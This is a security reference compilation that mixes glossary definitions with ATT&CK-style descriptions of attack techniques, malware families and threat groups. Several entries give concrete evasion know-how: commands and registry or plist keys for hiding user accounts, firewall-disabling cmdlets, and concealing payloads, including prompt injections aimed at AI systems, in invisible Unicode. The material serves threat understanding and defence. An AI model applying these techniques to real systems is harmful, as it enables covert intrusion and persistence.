Earth Lusca has used malware commonly used by other Chinese threat groups, including APT41 and the Winnti Group cluster, however security researchers assess Earth Lusca's techniques and infrastructure are separate.

Term: baseline configuration
Definition: A documented set of specifications for an information system, or a configuration item within a system, that has been formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures.

Term: Simulators
Definition: A functional exercise staff member who simulates or represents non-participating individuals or organizations whose input or participation is necessary to the flow of the exercise.

Name: Cloud Storage Object Discovery
Type: attack-pattern
Description: Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to File and Directory Discovery on a local host, after identifying available storage services (i.e. Cloud Infrastructure Discovery) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS and List Blobs in Azure .

Term: IA
Definition: The process of establishing the identity of an entity interacting with a system.

Term: Enterprise Risk Register
Definition: A risk register at the enterprise level that contains normalized and aggregated inputs from subordinate organizations’ risk registers and profiles.

Term: vulnerability analysis
Definition: Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.

Term: Circuit
Definition: A dedicated single connection between two endpoints on a network.

Term: records
Definition: The recordings of evidence of activities performed or results achieved (e.g., forms, reports, test results), which serve as a basis for verifying that the organization and the information system are performing as intended. Also used to refer to units of related data fields (i.e., groups of data fields that can be accessed by a program and that contain the complete set of information on particular items).

Term: privacy compromise
Definition: In the AML context, the unauthorized access of restricted or pro­prietary information that is part of an AI system, including information about a model’s training data, weights or architecture; or sensitive information that the model accesses such as the knowledge base of a GenAI retrieval-augmented generation (RAG) application.

Name: RDAT
Type: malware
Description: RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.

Term: mandatory access control (MAC)
Definition: A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (i.e., clearance) of users to access information of such sensitivity.

Name: MirageFox
Type: malware
Description: MirageFox is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012.

Term: security objective
Definition: Confidentiality, integrity, or availability.

Term: Cloud Consumer
Definition: A person or organization that maintains a business relationship with and uses service from Cloud Providers

Term: Normalize
Definition: The process by which differently formatted data is converted into a standardized format and labeled consistently.

Term: CALD
Definition: A process that is responsible for receiving audit and log events from system components, syntactically and semantically filtering the audit/log events, and dispatching to the appropriate processes for storage, remote transfer, performance analysis, and system monitoring and remediation.

Term: access control
Definition: The granting or denying of access rights to a user, program, or process.

Term: synchronous training
Definition: Training in which instructors and learners are scheduled to participate together in a virtual or physical classroom-based learning environment.

Term: Cellular Network Isolation Card (CNIC)
Definition: A SIM card that isolates the device from cell tower connectivity.

Term: life cycle
Definition: Evolution of a system, product, service, project, or other human-made entity.

Term: Serial Test
Definition: The purpose of this test is to determine whether the number of occurrences of m-bit overlapping patterns is approximately the same as would be expected for a random sequence.

Name: Hidden Users
Type: attack-pattern
Description: Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 

In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file. Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user’s home folder by changing the <code>chflags</code> to hidden. 

Adversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.

On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>). Display Managers are not anchored to specific distributions and may be changed by a user or adversary.

Term: FAR
Definition: The Federal Acquisition Regulations System is established for the codification and publication of uniform policies and procedures for acquisition by all executive agencies.

Term: block cipher
Definition: A family of functions and their inverse functions that is parameterized by cryptographic keys; the functions map bit strings of a fixed length to bit strings of the same length.

Name: SpeakUp
Type: malware
Description: SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019.

Term: AC
Definition: To ensure that an entity can only access protected resources if they have the appropriate permissions based on the predefined access control policies.

Term: risk mitigation plan (RMP)
Definition: A plan that describes the risks to a mission arising from an asset's operational factors and the decisions that balance risk cost with mission benefits.

Term: Identity, Credential, and Access Management (ICAM)
Definition: Programs, processes, technologies, and personnel used to create trusted digital identity representations of individuals and non-person entities (NPEs), bind those identities to credentials that may serve as a proxy for the individual or NPE in access transactions, and leverage the credentials to provide authorized access to an agency‘s resources. 
See also attribute-based access control (ABAC).

Term: Atomic Swap
Definition: An exchange of tokens that does not involve the intervention of any trusted intermediary and automatically reverts if all of the provisions are not met.

Term: penetration testing
Definition: A test methodology intended to circumvent the security function of a system.
Note: Penetration testing may leverage system documentation (e.g., system design, source code, manuals) and is conducted within specific constraints. Some penetration test methods use brute force techniques.

Term: risk analysis
Definition: Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Name: Out-of-Band Communications Channel
Type: course-of-action
Description: Establish secure out-of-band communication channels to ensure the continuity of critical communications during security incidents, data integrity attacks, or in-network communication failures. Out-of-band communication refers to using an alternative, separate communication path that is not dependent on the potentially compromised primary network infrastructure. This method can include secure messaging apps, encrypted phone lines, satellite communications, or dedicated emergency communication systems. Leveraging these alternative channels reduces the risk of adversaries intercepting, disrupting, or tampering with sensitive communications and helps coordinate an effective incident response.

Name: Kasidet
Type: malware
Description: Kasidet is a backdoor that has been dropped by using malicious VBA macros.

Name: RIPTIDE
Type: malware
Description: RIPTIDE is a proxy-aware backdoor used by APT12.

Term: verifier
Definition: The entity that verifies the authenticity of a digital signature using the public key.

Term: Command and Control
Definition: The exercise of authority and direction by a properly designated commander over assigned and attached forces in the accomplishment of the mission. Command and control functions are performed through an arrangement of personnel, equipment, communications, facilities, and procedures employed by a commander in planning, directing, coordinating, and controlling forces and operations in the accomplishment of the mission.

Term: senior agency official for privacy
Definition: The senior official designated by the head of each agency who has agency-wide responsibility for privacy, including implementing privacy protections; ensuring compliance with federal laws, regulations, and policies related to privacy; managing privacy risks at the agency; and filling a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: Inspection
Definition: Examination of an information system to determine compliance with security policy, procedures, and practices.

Term: Aggregated Information
Definition: Information elements collated on a number of individuals, typically used for the purposes of making comparisons or identifying patterns.

Term: Risk Reserve
Definition: A types of management reserve where funding or labor hours are set aside and employed if a risk is triggered to ensure the opportunity is realized or threat is avoided.

Name: Domain Trust Discovery
Type: attack-pattern
Description: Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting. Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP. The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.

Name: RGDoor
Type: malware
Description: RGDoor is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. RGDoor has been seen deployed on webservers belonging to the Middle East government organizations. RGDoor provides backdoor access to compromised IIS servers.

Term: Separation of Concerns
Definition: A design principle for breaking down an application into modules, layers, and encapsulations, the roles of which are independent of one another.

Term: CoT
Definition: A method for maintaining valid trust boundaries by applying a principle of transitive trust, where each software module in a system boot process is required to measure the next module before transitioning control.

Term: Third-Party Relationships
Definition: relationships with external entities. External entities may include, for example, service providers, vendors, supply-side partners, demand-side partners, alliances, consortiums, and investors, and may include both contractual and non-contractual parties.

Term: Anti-Forensic
Definition: A technique for concealing or destroying data so that others cannot access it.

Term: Pseudorandom function (PRF)
Definition: An indexed family of (efficiently computable) functions, each defined for the same input and output spaces. (For the purposes of this Recommendation, one may assume that both the index set and the output space are finite.) If a function from the family is selected by choosing an index value uniformly at random, and one’s knowledge of the selected function is limited to the output values corresponding to a feasible number of (adaptively) chosen input values, then the selected function is computationally indistinguishable from a function whose outputs were fixed uniformly at random.

Term: <em>e</em>
Definition: RSA public exponent; a positive integer.

Term: Repeatability
Definition: The ability to repeat an assessment in the future, in a manner that is consistent with, and hence comparable to, prior assessments.

Term: Host Name
Definition: Host names are most commonly defined and used in the context of DNS. The host name of a system typically refers to the fully qualified DNS domain name of that system.

Term: NSS
Definition: Any information system (including any telecommunications system) used or operated by an agency or by a contractor of an agency, or other organization on behalf of an agency—(i) the function, operation, or use of which involves intelligence activities; involves cryptologic activities related to national security; involves command and control of military forces; involves equipment that is an integral part of a weapon or weapons system; or is critical to the direct fulfillment of military or intelligence missions (excluding a system that is to be used for routine administrative and business applications, for example, payroll, finance, logistics, and personnel management applications); or (ii) is protected at all times by procedures established for information that have been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

Term: data integrity
Definition: A property whereby data has not been altered in an unauthorized manner since it was created, transmitted or stored. In this Recommendation, the statement that a cryptographic algorithm "provides data integrity" means that the algorithm is used to detect unauthorized alterations.

Term: Policy
Definition: The set of basic principles and associated guidelines, formulated and enforced by the governing body of an organization, to direct and limit its actions in pursuit of long-term goals.

Name: Windows Host Firewall
Type: attack-pattern
Description: Adversaries may disable or modify the Windows host firewall to bypass controls limiting network usage. This can include disabling the Windows host firewall entirely, suppressing specific profiles (domain, private, public), or adding, deleting, and modifying firewall rules to allow or restrict traffic.

Adversaries may perform these modifications through multiple mechanisms depending on the Windows operating system and access level. For example, adversaries may use command-line utilities (e.g., `netsh advfirewall` or PowerShell cmdlets like `Set-NetFirewallProfile`, `New-NetFirewallRule`), Windows Registry modifications (e.g., altering firewall states and rule configurations via registry keys), or the Windows Control Panel to modify firewall settings through the Windows Security interface.

By disabling or modifying Windows firewall services, adversaries may enable access to remote services, open ports for command and control traffic, or configure rules for further actions.

Term: proofing agent
Definition: An agent of the CSP who is trained to attend identity proofing sessions and can make limited risk-based decisions, such as physically inspecting identity evidence and comparing the applicant to the identity evidence.

Term: Operationalization
Definition: Putting MUD implementations into operational service in a manner that is both practical and effective.

Name: Shai-Hulud
Type: malware
Description: Shai-Hulud is a supply chain worm, first reported in September 2025, that spreads through code repositories, including GitHub and NPM packages. It exploits CI/CD pipeline dependencies to propagate to victims and poisons the supply chain by publishing malicious packages. Once inside a victim environment, Shai-Hulud steals credentials and access tokens from compromised repository accounts and exfiltrates them to attacker-controlled servers via encoded GitHub Actions workflows.

Name: Drovorub
Type: malware
Description: Drovorub is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by APT28.

Name: Elderwood
Type: intrusion-set
Description: Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers.

Name: C0021
Type: campaign
Description: C0021 was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. C0021's technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected APT29 activity.

Term: <em>i</em>
Definition: A counter taking integer values in the interval [1, 2<i><sup>r</sup></i>-1] that is encoded as a bit string of length <i>r</i>; used as an input to each invocation of a PRF in the counter mode and (optionally) in the feedback and double-pipeline iteration modes.

Term: One-to-one
Definition: The process in which a biometric sample from an individual is compared to a biometric reference to produce a comparison score.

Term: system component
Definition: A discrete, identifiable information technology asset that represents a building block of a system and may include hardware, software, and firmware.

Name: Web Protocols
Type: attack-pattern
Description: Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as HTTP/S and WebSocket that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Term: integrity check value
Definition: See checksum.

Term: Domain parameter
Definition: Parameters used with cryptographic algorithms that are usually common to a domain of users. An ECDSA or EdDSA cryptographic key pair is associated with a specific set of domain parameters.

Name: Sardonic
Type: malware
Description: Sardonic is a backdoor written in C and C++ that is known to be used by FIN8, as early as August 2021 to target a financial institution in the United States. Sardonic has a plugin system that can load specially made DLLs and execute their functions.

Term: trustworthiness
Definition: Computer hardware, software and procedures that— 
1) are reasonably secure from intrusion and misuse; 
2) provide a reasonable level of availability, reliability, and correct operation; 
3) are reasonably suited to performing their intended functions; and 
4) adhere to generally accepted security procedures.

Term: Manageability
Definition: Providing the capability for the granular administration of personal information, including alteration, deletion, and selective disclosure.

Term: Chief Data Officer
Definition: A senior executive responsible for the utilization and governance of data across the agency or organization.

Term: baseline
Definition: The set of security and privacy controls defined for a low-impact, moderate-impact, or high-impact system or selected based on the privacy selection criteria that provide a starting point for the tailoring process.

Name: Identify Roles
Type: attack-pattern
Description: Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing).

Term: Derived PIV Credential
Definition: An X.509 Derived PIV Authentication certificate with associated public and private key that is issued in accordance with the requirements specified in this document where the PIV Authentication certificate on the applicant’s PIV Card serves as the original credential. The Derived PIV Credential (DPC) is an additional common identity credential under Homeland Security Presidential Directive-12 and Federal Information Processing Standards (FIPS) 201 that is issued by a federal department or agency and is used with mobile devices.

Term: maritime cyberspace
Definition: A global domain consisting of the interdependent networks of Information Technology (IT) infrastructure, Operational Technology (OT) infrastructure, resident data, the electromagnetic spectrum, and any telecommunications networks, computers, information and communications systems, and embedded processors, and controllers related to maritime processes and functions.

Term: security risk
Definition: the level of impact on agency operations (including mission functions, image, or reputation), agency assets, or individuals resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. Note: Organizations subordinate to federal agencies may use the term senior information security officer or chief information security officer to denote individuals who fill positions with similar responsibilities to senior agency information security officers.

Term: cyber incident
Definition: Anomalous or unexpected event, set of events, condition, or situation at any time during the life cycle of a project, product, service, or system.

Name: RIFLESPINE
Type: malware
Description: RIFLESPINE is a cross-platform backdoor that leverages Google Drive for file transfer and command execution.

Term: Key-derivation function
Definition: A function that, with the input of a cryptographic key or shared secret, and possibly other data, generates a binary string, called keying material.

Term: Manual key transport
Definition: A non-automated means of transporting cryptographic keys by physically moving a device or document containing the key or key component.

Term: File Header
Definition: Data within a file that contains identifying information about the file and possibly metadata with information about the file contents.

Term: Flash ROM
Definition: Non-volatile memory that is writable.

Name: YAHOYAH
Type: malware
Description: YAHOYAH is a Trojan used by Tropic Trooper as a second-stage backdoor.

Term: classified national security information
Definition: Information that Executive Order 13526, "Classified National Security Information," December 29, 2009 (3 CFR, 2010 Comp., p. 298), or any predecessor or successor order, or the Atomic Energy Act of 1954, as amended, requires agencies to mark with classified markings and protect against unauthorized disclosure. Note: Synonymous with classified national security information (CNSI) (see E.O. 13526). Often used interchangeably with national security information (NSI) (see E.O. 13526).

Term: IT
Definition: Any services, equipment, or interconnected system(s) or subsystem(s) of equipment, that are used in the automatic acquisition, storage, analysis, evaluation, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the agency. For purposes of this definition, such services or equipment if used by the agency directly or is used by a contractor under a contract with the agency that requires its use; or to a significant extent, its use in the performance of a service or the furnishing of a product. Information technology includes computers, ancillary equipment (including imaging peripherals, input, output, and storage devices necessary for security and surveillance), peripheral equipment designed to be controlled by the central processing unit of a computer, software, firmware and similar procedures, services (including cloud computing and help-desk services or other professional services which support any point of the life cycle of the equipment or service), and related resources. Information technology does not include any equipment that is acquired by a contractor incidental to a contract which does not require its use.

Term: access agreement
Definition: See user agreement.

Term: FCKMS personnel
Definition: The individuals of an FCKMS service-providing organization that are authorized to assume the supported roles of the FCKMS.

Term: Guest operating system
Definition: The operating system component of the execution stack of a Virtual Machine (see below), others being Virtual Hardware, Middleware and Applications.

Term: traceability matrix
Definition: A matrix that records the relationship between two or more products of the development process (e.g., a matrix that records the relationship between the requirements and the design of a given software component).

Term: MAC
Definition: A family of symmetric-key cryptographic algorithms that act on input data of arbitrary length to produce an output value of a specified length (i.e., the MAC of the input data). The MAC can be employed to authenticate the origin of the input data and/or provide data integrity protection.

Term: IV
Definition: A binary string that is used as an initial value in computing the first iteration in feedback mode. It may be an empty string.

Term: media
Definition: Physical devices or writing surfaces including, but not limited to, magnetic tapes, optical disks, magnetic disks, Large-Scale Integration memory chips, and printouts (but excluding display media) onto which information is recorded, stored, or printed within a system.

Term: Normalization strategy
Definition: The similarity function can follow one of two normalization strategies, depending on whether the algorithm describes resemblance or containment. For resemblance queries, the number of matching features will be weighed against the total number of features in both objects. In the case of containment queries, the algorithm may disregard unmatched features in the larger of the objects’ two-feature sets.

Term: SIA
Definition: The analysis conducted by an organizational official to determine the extent to which a change to the information system has or may have affected the security posture of the system.

Term: <em>T</em>
Definition: The authentication tag.

Term: key
Definition: A bit string that is used in conjunction with a cryptographic algorithm, such as the encapsulation and decapsulation keys (of a KEM), the shared secret key (produced by a KEM), and the encryption and decryption keys (of a PKE).

Name: PowerSploit
Type: tool
Description: PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration.

Term: shadow model
Definition: A model that imitates the behavior of the target model. The training datasets and the truth about membership in these datasets are known for these models. Typically, the attack model is trained on the labeled inputs and outputs of the shadow model.

Term: Concatenation
Definition: Concatenation

Term: message authentication code (MAC)
Definition: A family of cryptographic algorithms that is parameterized by a symmetric key. Each of the algorithms can act on input data of arbitrary length to produce an output value of a specified length (called the MAC of the input data). A MAC algorithm can be used to provide data origin authentication and data integrity.

Name: Astaroth
Type: malware
Description: Astaroth is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017.

Name: HAMMERTOSS
Type: malware
Description: HAMMERTOSS is a backdoor that was used by APT29 in 2015.

Name: Sea Turtle
Type: intrusion-set
Description: Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection.

Term: generative artificial intelligence
Definition: The class of AI models that emulate the structure and characteristics of input data in order to generate derived synthetic content. This can include images, videos, audio, text, and other digital content.

Name: BOOKWORM
Type: malware
Description: BOOKWORM is a modular trojan known to be leveraged by Mustang Panda and was first observed utilized in 2015. BOOKWORM was later updated in late 2021 and the fall of 2022 to launch shellcode represented as UUID parameters.

Term: negative control (security)
Definition: Passive form of security monitoring where a specified action or event triggers an alarm; a lack of information indicates the item being monitored is secure.

Term: digital identity
Definition: The set of physical and behavioral characteristics by which an individual is uniquely recognizable. 
Note: This also encompasses non-person entities (NPEs).

Term: <em>w</em>
Definition: An integer that denotes the length of a key derivation key in bits.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure in which the resultant secret keying material is a function of information contributed by both participants so that neither party can predetermine the value of the secret keying material independently from the contributions of the other party. Key agreement includes the creation (i.e., generation) of keying material by the key-agreement participants. A separate distribution of the generated keying material is not performed. Contrast with Key transport.

Term: Group
Definition: A named collection of userIDs.

Term: Biometrics
Definition: Automated recognition of individuals based on their behavioral and biological characteristics. 
In this document, biometrics may be used to unlock authentication tokens and prevent repudiation of registration.

Term: Pairwise Pseudonymous Identifier
Definition: An opaque unguessable subscriber identifier generated by a CSP for use at a specific individual RP. This identifier is only known to and only used by one CSP-RP pair.

Name: Search Threat Vendor Data
Type: attack-pattern
Description: Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. These reports may include descriptions of behavior, detailed breakdowns of attacks, atomic indicators such as malware hashes or IP addresses, timelines of a group’s activity, and more. Adversaries may change their behavior when planning their future operations. 

Adversaries have been observed replacing atomic indicators mentioned in blog posts in under a week. Adversaries have also been seen searching for their own domain names in threat vendor data and then taking them down, likely to avoid seizure or further investigation.

This technique is distinct from Threat Intel Vendors in that it describes threat actors performing reconnaissance on their own activity, not in search of victim information.

Term: sanitization
Definition: Actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means. 
Process to remove information from media such that data recovery is not possible. It includes removing all classified labels, markings, and activity logs.

Term: organizational user
Definition: An organizational employee or an individual the organization deems to have equivalent status of an employee including, for example, contractor, guest researcher, or individual detailed from another organization.

Name: Invisible Unicode
Type: attack-pattern
Description: Adversaries may abuse invisible or non-printing Unicode characters to conceal malicious content within files, scripts, or text. By inserting characters that do not visibly render, adversaries may hide data, alter how content is interpreted, or make malicious code appear as benign text or whitespace. Adversaries may encode these malicious payloads, using binary, Base64, or custom schemes, to be reconstructed at runtime through scripting features such as JavaScript Proxy traps, `eval()`, or other dynamic execution methods. This technique enables adversaries to evade visual inspection and basic static analysis by hiding malicious encoded content in innocuous text. 

Unicode is a standardized character encoding model that assigns a unique numerical value, known as a code point, to every character across writing systems, enabling consistent text representation across platforms, applications, and languages. Code points are represented as `U+` followed by a hexadecimal value and may be encoded using formats such as `UTF-8` or `UTF-16`. Adversaries may abuse the valid code points in Unicode that are not visibly rendered but still take up bytes, such as zero-width spaces, variation selectors, or bidirectional formatting controls, to conceal malicious payloads.

Adversaries may additionally exploit Private Use Area (PUA) characters, a range of code points reserved for custom assignment. PUA characters that are not defined by a font or application are typically rendered blank.

Unicode characters may also be leveraged in support of other techniques such as Phishing, Right-to-Left Override, or User Execution. For example, some adversaries may embed artificial intelligence (AI) prompt injections using invisible Unicode characters in emails or documents that appear benign when processed by AI systems.

Name: esentutl
Type: tool
Description: esentutl is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.

Term: <em>0x</em>
Definition: A string of x zero bits.

Term: insider
Definition: Any person with authorized access to business resources, including personnel, facilities, information, equipment, networks, or systems.

Name: Windigo
Type: intrusion-set
Description: The Windigo group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the Ebury SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, Windigo operators continued updating Ebury through 2019.

Term: systems privacy engineer
Definition: Individual assigned responsibility for conducting systems privacy engineering activities.

Name: Remote Services
Type: attack-pattern
Description: Adversaries may use Valid Accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP). They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain, or management platforms for internal virtualization environments such as VMware vCenter. 

Legitimate applications (such as Software Deployment Tools and other administrative programs) may utilize Remote Services to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.

Term: firmware
Definition: Computer programs (which are stored in and executed by computer hardware) and associated data (which also is stored in the hardware) that may be dynamically written or modified during execution.

Term: basic assessment
Definition: An assessment that includes only critical elements.

Term: CSF Subcategory
Definition: A group of more specific outcomes of technical and management cybersecurity activities that comprise a CSF Category.

Term: Federation Administrators
Definition: See Federation Administrators.

Name: Mini Shai-Hulud
Type: malware
Description: Mini Shai-Hulud is a credential stealer and self-replicating supply chain worm, derived from Shai-Hulud, that has been used by TeamPCP to target Continuous Integration and Continuous Delivery/Deployment (CI/CD) workflows since at least 2026. Mini Shai-Hulud can compromise credentials across multiple cloud, container, and AI configuration file paths and can use stolen npm and GitHub OIDC tokens to spread to other packages maintained by the compromised user. Mini Shai-Hulud also has a targeted wiper component and has used multiple C2 and data exfiltration mechanisms.

Term: federal agency
Definition: See Executive Agency

Term: RMF
Definition: The Risk Management Framework (RMF) provides a structured, yet flexible approach for managing the portion of risk resulting from the incorporation of systems into the mission and business processes of the organization.

Term: sanitization
Definition: Actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means. Process to remove information from media such that data recovery is not possible.

Term: nonfederal system
Definition: A system that does not meet the criteria for a federal system.

Term: continuous monitoring program
Definition: A program established to collect information in accordance with preestablished metrics, utilizing information readily available in part through implemented security controls. Note: Privacy and security continuous monitoring strategies and programs can be the same or different strategies and programs.

Term: Aggregation
Definition: The consolidation of similar log entries into a single entry containing a count of the number of occurrences of the event.

Term: Transport Layer Security (TLS)
Definition: A security protocol providing privacy and data integrity between two communicating applications. The protocol is composed of two layers: the TLS Record Protocol and the TLS Handshake Protocol.

Term: min-entropy
Definition: The min-entropy (in bits) of a random variable X is the largest value m having the property that each observation of X provides at least m bits of information (i.e., the min-entropy of X is the greatest lower bound for the information content of potential observations of X). The min-entropy of a random variable is a lower bound on its entropy. The precise formulation for min-entropy is (log2 max pi) for a discrete distribution having probabilities p1, ...,pk. Min-entropy is often used as a worst-case measure of the unpredictability of a random variable.

Term: Subkey
Definition: A secret string that is derived from the key.

Name: Remote Service Session Hijacking
Type: attack-pattern
Description: Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. Remote Service Session Hijacking differs from use of Remote Services because it hijacks an existing session rather than creating a new session using Valid Accounts.

Term: approved
Definition: Federal Information Processing Standards (FIPS)-approved or NIST-recommended. An algorithm or technique that meets at least one of the following: 1) is specified in a FIPS or NIST Recommendation, 2) is adopted in a FIPS or NIST Recommendation or 3) is specified in a list of NIST-approved security functions (e.g., specified as approved in the annexes of [FIPS 140]).

Term: FCKMS
Definition: Federal Cryptographic Key Management System. A CKMS that conforms to the requirements of SP 800-152.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to harm an information system through unauthorized access, destruction, disclosure, modification of data, and/or denial of service. Threats arise from human actions and natural events.

Term: Off-Chain
Definition: Refers to data that is stored or a process that is implemented and executed outside of any blockchain system.

Term: supply chain element
Definition: Organizations, entities, or tools employed for the research and development, design, manufacturing, acquisition, delivery, integration, operations and maintenance, and disposal of systems and system components.

Term: Rules of Engagement (ROE)
Definition: Detailed guidelines and constraints regarding the execution of information security testing. The ROE is established before the start of a security test, and gives the test team authority to conduct defined activities without the need for additional permissions.

Term: Archive facility
Definition: To place information into long-term storage. Also, see Key management archive.

Term: Framework Profile
Definition: A representation of the outcomes that a particular system or organization has selected from the Framework Categories and Subcategories.

Term: Standalone Environment
Definition: Environment containing individually managed devices (e.g., desktops, laptops, smartphones, tablets).

Term: <em>rv[0…b]</em>
Definition: For bit string rv, rv[0…b] is a substring consisting of the leftmost b+1 bit(s) of rv, where b ≥ 0.

Name: FunnyDream
Type: campaign
Description: FunnyDream was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the FunnyDream campaign to possible Chinese-speaking threat actors through the use of the Chinoxy backdoor and noted infrastructure overlap with the TAG-16 threat group.

Name: Rocke
Type: intrusion-set
Description: Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.

Name: Web Services
Type: attack-pattern
